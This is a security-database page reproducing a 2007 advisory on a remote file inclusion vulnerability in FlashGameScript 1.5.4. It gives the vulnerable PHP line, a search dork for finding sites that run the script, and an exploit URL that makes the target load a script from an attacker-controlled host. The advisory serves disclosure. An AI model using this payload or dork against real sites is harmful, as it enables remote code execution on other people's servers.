Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16161
HistoryFeb 23, 2007 - 12:00 a.m.

FlashGameScript v1.5.4 Remote File Inclusion Vulnerability

2007-02-2300:00:00
vulners.com
70
JSON

Author : JuMp-Er
Date : feb, 21th 2007
Level : Dangerous
contact: : aH-crew[at]hotmail[dot]com

Software description

App :FlashGameScript
Version :1.5.4
URL :http://www.flashgamescript.com/
Dork :Copyright © 2006-2007 Powered by FlashGameScript.com version 1.5 All Rights Reserved
Price: :$60
Description :
Flash Game Script is the latest arcade website script created by developers at ghoney.com and will be market by folks at FlashGameScript.com.
Our game site script is created to maximized arcade site owner’s profit with additional plug-in for alternative income opportunities.

Vulnerability:

at index.php line 28: $func =$_GET[func];

Exploit:

http://www.target.com/index.php?func=http://attacker.com/evil_script?

Greetz to all members of active. Hacking Crew

JSON